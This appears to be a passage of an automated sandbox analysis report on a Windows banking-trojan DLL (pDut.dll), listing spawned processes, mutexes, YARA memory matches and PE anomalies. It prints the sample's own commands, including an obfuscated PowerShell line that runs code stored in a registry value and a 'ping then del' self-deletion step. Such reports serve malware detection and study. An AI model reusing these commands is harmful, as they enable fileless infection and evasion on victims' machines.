Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B19.tmp" "c:\Users\user\AppData\Local\Temp\CSC9452DD6E90C74A5284F45229D37BC.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52D7.tmp" "c:\Users\user\AppData\Local\Temp\CSCE5529B6452BD443991E7FB86A88433C.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil qe "application" /c:100 /rd:false
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B19.tmp" "c:\Users\user\AppData\Local\Temp\CSC9452DD6E90C74A5284F45229D37BC.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52D7.tmp" "c:\Users\user\AppData\Local\Temp\CSCE5529B6452BD443991E7FB86A88433C.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220422 Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AB9.tmp Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@28/28@0/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05246DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 3_2_05246DB6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{E4EC764A-F3D2-B67B-9D58-D74A210CFB1E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{641E559F-7356-3629-1DD8-57CAA18C7B9E}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2760
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: pDut.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.459253096.0000000006640000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.465973430.0000000006640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.298329134.0000000000480000.00000002.00000001.01000000.00000003.sdmp, pDut.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.459253096.0000000006640000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.465973430.0000000006640000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05247E20 push ecx; ret 3_2_05247E29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0524820B push ecx; ret 3_2_0524821B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0524B2FF push esi; retf 3_2_0524B301
Source: pDut.dll Static PE information: real checksum: 0x872fe521 should be: 0x9cd14
Source: cweuuamv.dll.25.dr Static PE information: real checksum: 0x0 should be: 0xa779
Source: 41kkxng4.dll.29.dr Static PE information: real checksum: 0x0 should be: 0x8776
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\41kkxng4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cweuuamv.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: Yara match File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\pDut.dll
Source: C:\Windows\System32\mshta.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
